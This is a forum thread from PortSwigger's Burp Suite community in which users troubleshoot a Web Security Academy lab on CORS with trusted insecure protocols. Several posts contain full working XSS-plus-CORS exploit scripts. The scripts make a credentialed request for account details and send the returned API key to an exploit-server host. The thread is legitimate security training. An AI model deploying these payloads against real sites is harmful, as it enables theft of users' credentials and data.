Burp Suite User Forum


Faulty Lab: "CORS vulnerability with trusted insecure protocols"

Nemeses5174 | Last updated: Dec 30, 2023 03:22PM UTC

Hi, maybe there is a bug inside the laboratory "CORS vulnerability with trusted insecure protocols". The following exploit script works with Burp's Chrome: <script> document.location = "https://stock.[LAB-ID].web-security-academy.net/?storeId=hi&productId=%27%3Cscript%3E+function+submitRequest%28%29+%7B+var+xhr+%3D+new+XMLHttpRequest%28%29%3B+xhr.open%28%22GET%22%2C+%22https%3A%5C%2F%5C%2F[LAB-ID].web-security-academy.net%5C%2FaccountDetails%22%2C+true%29%3B+xhr.withCredentials+%3D+true%3B+xhr.onload+%3D+%28%29+%3D%3E+%7B+document.location+%3D+%22https%3A%2F%2F[EXPLOIT-SERVER-ID].exploit-server.net%2F%3Fabcd%3D%22+%2B+xhr.responseText%3B+%7D%3B+xhr.send%28%29%3B+%7D+submitRequest%28%29%3B+%3C%2Fscript%3E%27" </script> The secret admin API key will be recorded in the exploit server's log page. BUT the exploit script above does NOT work when I deliver it to the victim (the victim opens the exploit page but the API key is not recorded in the exploit server's log page). If I use the solution code (very similar to the one above) everything works great. Maybe a bug in the laboratory? Have a good day.

Ben, PortSwigger Agent | Last updated: Jan 09, 2024 09:39AM UTC

Hi, to confirm, does your exploit work when you use the 'View exploit' functionality, i.e. you land on the log page and your user's API key is in the URL?

Łukasz | Last updated: Mar 11, 2024 03:00PM UTC

I also don't get it, but it appears that URL encoding messes this up. When I tried: <script> document.location="http://stock.0afc00d603b5d54082d510900049005b.web-security-academy.net/?productId=4%3cscript>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0afc00d603b5d54082d510900049005b.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://exploit-0af300790394d58f82b60f24012b00d4.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1" </script> (so only the one < of the first script element encoded more) it also didn't work, but using the exact option from the solution worked: <script> document.location="http://stock.0afc00d603b5d54082d510900049005b.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0afc00d603b5d54082d510900049005b.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://exploit-0af300790394d58f82b60f24012b00d4.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1" </script>

Ben, PortSwigger Agent | Last updated: Mar 12, 2024 11:23AM UTC

Hi Łukasz, your proposed exploit appears to work for me and allows me to obtain the administrator user's API key for this particular lab. Are you seeing no interactions from the victim user in the access logs when you deliver this?
